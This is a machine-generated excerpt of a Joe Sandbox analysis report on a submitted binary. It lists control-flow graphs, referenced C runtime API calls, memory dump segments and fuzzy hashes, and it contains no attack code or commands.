                                                            control_flow_graph 629 e15b0c-e15b17 630 e15b19-e15b1d 629->630 631 e15b3d 629->631 630->631 632 e15b1f-e15b30 call e1106a 630->632 633 e15b3f-e15b42 631->633 636 e15b43-e15b54 call e1106a 632->636 637 e15b32-e15b37 call e10aec 632->637 642 e15b56-e15b57 call e0a933 636->642 643 e15b5f-e15b71 call e1106a 636->643 637->631 646 e15b5c-e15b5d 642->646 648 e15b83-e15b9f call e14e34 call e158f0 643->648 649 e15b73-e15b81 call e0a933 * 2 643->649 646->637 658 e15ba1-e15bb8 call e134e0 call e13579 call e0a933 648->658 659 e15bba-e15bcb call e13acd 648->659 649->646 674 e15bec-e15bee 658->674 665 e15bf0-e15bf8 659->665 666 e15bcd-e15be9 call e0a933 call e134e0 call e13579 call e0a933 659->666 668 e15bfa-e15bfc 665->668 666->674 668->633 674->668
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                            • String ID:
                                                            • API String ID: 2193103758-0
                                                            • Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                            • Instruction ID: 3517c787ab97b89e5cebb95f979b80020a6485e7778f09b2fb823567aa7868c2
                                                            • Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                            • Instruction Fuzzy Hash: 0A21E537108A01EFD7257F29E802DCBBBE5EFC1750B20A02AF4957A1A1DE319DC08A55

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 680 e0c93a-e0c94d 681 e0ca02-e0ca08 680->681 682 e0c953-e0c955 680->682 685 e0ca0d-e0ca19 call e0bfb4 681->685 683 e0c9e1-e0c9f8 682->683 684 e0c95b-e0c96a call e0c4fa 682->684 686 e0c9fa 683->686 687 e0c9ff-e0ca00 683->687 692 e0c9d4-e0c9e0 684->692 693 e0c96c-e0c975 684->693 686->687 687->685 693->692 694 e0c977-e0c979 693->694 695 e0c97b-e0c97d 694->695 696 e0c9ce 694->696 697 e0c992-e0c9a9 695->697 698 e0c97f-e0c991 695->698 696->692 699 e0c9b0-e0c9cd call e0c6e4 697->699 700 e0c9ab 697->700 700->699
                                                            APIs
                                                            • UnDecorator::getArgumentList.LIBCMT ref: 00E0C95F
                                                              • Part of subcall function 00E0C4FA: Replicator::operator[].LIBCMT ref: 00E0C57D
                                                              • Part of subcall function 00E0C4FA: DName::operator+=.LIBCMT ref: 00E0C585
                                                            • DName::operator+.LIBCMT ref: 00E0C9B8
                                                            • DName::DName.LIBCMT ref: 00E0CA10
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                            • String ID: (;C$4;C$8;C$D;C
                                                            • API String ID: 834187326-2621726175
                                                            • Opcode ID: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                            • Instruction ID: 58f869506f629371130fa01a59eb631c2e22c916adc780fe2308d82daa6100b1
                                                            • Opcode Fuzzy Hash: a0090458237679d067ced1afd8bb8c1e263f460860677f0579ee007d7b594e8e
                                                            • Instruction Fuzzy Hash: CE21B330601248AFCB11DF5CD4449A97BF0FF4934EB64A255E846EB3A3EB30E982CB44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 703 dca5c8-dca5f3 call dcb540 706 dca5f9-dca5fc 703->706 707 dca967-dca96c call dd0409 703->707 706->707 708 dca602-dca60b 706->708 710 dca708-dca70e 708->710 711 dca611-dca615 708->711 714 dca716-dca724 710->714 711->710 713 dca61b-dca622 711->713 715 dca63a-dca63f 713->715 716 dca624-dca62b 713->716 717 dca72a-dca72e 714->717 718 dca8d0-dca8d3 714->718 715->710 720 dca645-dca64d call dca24c 715->720 716->715 719 dca62d-dca634 716->719 717->718 723 dca734-dca73b 717->723 721 dca8d5-dca8d8 718->721 722 dca8f6-dca8ff call dca24c 718->722 719->710 719->715 737 dca901-dca905 720->737 738 dca653-dca66c call dca24c * 2 720->738 721->707 725 dca8de-dca8f3 call dca96d 721->725 722->707 722->737 726 dca73d-dca744 723->726 727 dca753-dca759 723->727 725->722 726->727 731 dca746-dca74d 726->731 732 dca75f-dca786 call dc8406 727->732 733 dca870-dca874 727->733 731->718 731->727 732->733 745 dca78c-dca78f 732->745 735 dca876-dca87f call dc87cc 733->735 736 dca880-dca88c 733->736 735->736 736->722 742 dca88e-dca898 736->742 738->707 765 dca672-dca678 738->765 747 dca89a-dca89c 742->747 748 dca8a6-dca8a8 742->748 750 dca792-dca7a7 745->750 747->722 751 dca89e-dca8a2 747->751 752 dca8bf-dca8cc call dcafe6 748->752 753 dca8aa-dca8bd call dca24c * 2 748->753 755 dca7ad-dca7b0 750->755 756 dca851-dca864 750->756 751->722 758 dca8a4 751->758 770 dca8ce 752->770 771 dca92b-dca940 call dca24c * 2 752->771 777 dca906 call dd2cce 753->777 755->756 762 dca7b6-dca7be 755->762 756->750 761 dca86a-dca86d 756->761 758->753 761->733 762->756 769 dca7c4-dca7d8 762->769 767 dca67a-dca67e 765->767 768 dca6a4-dca6ac call dca24c 765->768 767->768 773 dca680-dca687 767->773 787 dca6ae-dca6ce call dca24c * 2 call dcafe6 768->787 788 dca710-dca713 768->788 774 dca7db-dca7ec 769->774 770->722 800 dca945-dca962 call dc85f2 call dcaee6 call dcb0a3 call dcae5d 771->800 801 dca942 771->801 778 dca689-dca690 773->778 779 dca69b-dca69e 773->779 780 dca7ee-dca7ff call dcaaa3 774->780 781 dca812-dca81f 774->781 791 dca90b-dca926 call dc87cc call dcac57 call dc839a 777->791 778->779 785 dca692-dca699 778->785 779->707 779->768 797 dca801-dca80a 780->797 798 dca823-dca84b call dca548 780->798 781->774 790 dca821 781->790 785->768 785->779 787->788 818 dca6d0-dca6d5 787->818 788->714 795 dca84e 790->795 791->771 795->756 797->780 803 dca80c-dca80f 797->803 798->795 800->707 801->800 803->781 818->777 819 dca6db-dca6ee call dcac6f 818->819 819->791 824 dca6f4-dca700 819->824 824->777 825 dca706 824->825 825->819
                                                            APIs
                                                            • type_info::operator==.LIBVCRUNTIME ref: 00DCA6E7
                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00DCA7F5
                                                            • CallUnexpected.LIBVCRUNTIME ref: 00DCA962
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 1206542248-393685449
                                                            • Opcode ID: a3a4a3ca688090ebc1c50477757e456f54eb8fba265270a59f8dc84c2e48f4b7
                                                            • Instruction ID: a7d95f9a58568d740aa9a24b9d2a7d1e0c6cc5adb6be5ee4217115b1aea62573
                                                            • Opcode Fuzzy Hash: a3a4a3ca688090ebc1c50477757e456f54eb8fba265270a59f8dc84c2e48f4b7
                                                            • Instruction Fuzzy Hash: 35B1357180021EABCF15DFA8C981EAEB7B5FF14318B19415EE8116B212D731DA52CFB2
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,1539EB79,?,00DD6057,00DCC446,?,F8250000,00000000), ref: 00DD600B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3664257935-537541572
                                                            • Opcode ID: c10ee2f41ffc457b15369a93bce8005854491d3ded299bd912251c523d7cf5ae
                                                            • Instruction ID: d071fec1ad1713b89c9229c3c8cfb6d5dcb17a9e3db39d6c19a8a80e274384ff
                                                            • Opcode Fuzzy Hash: c10ee2f41ffc457b15369a93bce8005854491d3ded299bd912251c523d7cf5ae
                                                            • Instruction Fuzzy Hash: A621A836A01651ABC721AF75EC44A6E7758AF417A0B280126F915FF3D4DA30EE05C6F0
                                                            APIs
                                                            • UnDecorator::UScore.LIBCMT ref: 00E0E2DD
                                                            • DName::DName.LIBCMT ref: 00E0E2E9
                                                              • Part of subcall function 00E0BFB4: DName::doPchar.LIBCMT ref: 00E0BFE5
                                                            • UnDecorator::getScopedName.LIBCMT ref: 00E0E328
                                                            • DName::operator+=.LIBCMT ref: 00E0E332
                                                            • DName::operator+=.LIBCMT ref: 00E0E341
                                                            • DName::operator+=.LIBCMT ref: 00E0E34D
                                                            • DName::operator+=.LIBCMT ref: 00E0E35A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                            • String ID:
                                                            • API String ID: 1480779885-0
                                                            • Opcode ID: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
                                                            • Instruction ID: daa01ca7cb2f45d464693a729ac7ced3a62fdcfd6f497ec4f43891a190db4b92
                                                            • Opcode Fuzzy Hash: 23bb66ba7c0c68d0bfc5bce08223bbb55780766e01e2ba2a51e198509357868b
                                                            • Instruction Fuzzy Hash: 8711A071900208AFC709EB68C856AAD7FB0BF00305F4450A9E052FB3E2DB74AAC1CB51
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00DC3DBD
                                                            • int.LIBCPMT ref: 00DC3DD0
                                                              • Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
                                                              • Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF
                                                            • std::_Facet_Register.LIBCPMT ref: 00DC3E03
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00DC3E19
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00DC3E24
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                            • String ID: G`
                                                            • API String ID: 2081738530-381365254
                                                            • Opcode ID: 6d157ea9c9695c2c0e72d2abb28b617c00f890d47b4520e1568a23cc57747977
                                                            • Instruction ID: 43bf20bbd432471ee0abd0c2f20ba0b8cad1de61768737cd96a46bd9ce2ccefe
                                                            • Opcode Fuzzy Hash: 6d157ea9c9695c2c0e72d2abb28b617c00f890d47b4520e1568a23cc57747977
                                                            • Instruction Fuzzy Hash: 3E01A276900126ABCB25AF54E805EAE7778DF81760B24425CF806A7292DB34EE02C7B0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2ad009330fb7549d99f347d192814a72af6a115726ef35fee8a386523200f3c1
                                                            • Instruction ID: 3c1b96ea925b49a655213708e1d6389981c26d55c92c6a2c1015f8c17eec47a5
                                                            • Opcode Fuzzy Hash: 2ad009330fb7549d99f347d192814a72af6a115726ef35fee8a386523200f3c1
                                                            • Instruction Fuzzy Hash: 11B1C274A00249AFDB15DFA9D880BAD7BB1EF45304F18416AE442AB3A2CB71DD42CF70
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                            • String ID:
                                                            • API String ID: 4267394785-0
                                                            • Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                            • Instruction ID: a77113770ac9a3a517de3a17c1b326caa98720891800103be8c5bcbe0901de77
                                                            • Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                            • Instruction Fuzzy Hash: 1421A1B6B0014A9ACF28DFBCC9459FCBBB5AB04308F506166E611F7581DEB09EC48F10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                            • String ID:
                                                            • API String ID: 4267394785-0
                                                            • Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                            • Instruction ID: 3066235daa5b24bb3ff68033b32ce10894c210776c3b70498301dd5bc479fa5b
                                                            • Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                            • Instruction Fuzzy Hash: 6E219FB6B0014A9ACF28DFACC9459FC7BB6AB04308F506166A611F7581DEB09AC48E10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                            • String ID:
                                                            • API String ID: 4267394785-0
                                                            • Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                            • Instruction ID: a9ded9b164151788f9b9a6ee44ac1ce13d16aa12f3e5bf130a023076067c3f9e
                                                            • Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                            • Instruction Fuzzy Hash: 1121A1B6B0014A9ACF28DFBCC9459FC7BB6AB04309F506166E611F7581DEB09EC48F10
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                            • String ID:
                                                            • API String ID: 4267394785-0
                                                            • Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                            • Instruction ID: 649617d45315e8ca2009ea9baad6ee65b339f039684b9936e921ea710c54ff02
                                                            • Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                            • Instruction Fuzzy Hash: 7421A1B6B0014A9ACF28DFBCD9459FC7BB6AB04308F506166E611F7581DEB49EC48F10
                                                            APIs
                                                            • __EH_prolog3.LIBCMT ref: 00DC53B8
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00DC53C2
                                                            • int.LIBCPMT ref: 00DC53D9
                                                              • Part of subcall function 00DC16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00DC16C5
                                                              • Part of subcall function 00DC16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00DC16DF
                                                            • std::_Facet_Register.LIBCPMT ref: 00DC5413
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00DC5433
                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00DC5440
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                            • String ID:
                                                            • API String ID: 55977855-0
                                                            • Opcode ID: 524fc862daab7660b3c588ace259969bdc7715fac08fbed745d8c249461d902b
                                                            • Instruction ID: a63900f9363559d64b3887bf1843c46179a2d7abc69cff46e7a8589995689012
                                                            • Opcode Fuzzy Hash: 524fc862daab7660b3c588ace259969bdc7715fac08fbed745d8c249461d902b
                                                            • Instruction Fuzzy Hash: A811FD35910A2A8BCB14EB64E805BAE73B4EF44321F18010DF805A7385DF70AA418BB0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00DCA251,00DC8978,00DC7AFF), ref: 00DCA268
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DCA276
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DCA28F
                                                            • SetLastError.KERNEL32(00000000,00DCA251,00DC8978,00DC7AFF), ref: 00DCA2E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 3632433e352c635da1f55066d6de3149fd38335906e72f6c8b4a76db20f0f4dc
                                                            • Instruction ID: ef92bb1af5a0a991b5db5b071bbfc71e5b33002777cccc92ce6270f148d9f298
                                                            • Opcode Fuzzy Hash: 3632433e352c635da1f55066d6de3149fd38335906e72f6c8b4a76db20f0f4dc
                                                            • Instruction Fuzzy Hash: 6201B53251D3676EA62437B87CC6F666746EB0277DB24022EF1108B1E1EF528D02517A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                            • String ID:
                                                            • API String ID: 1181530324-0
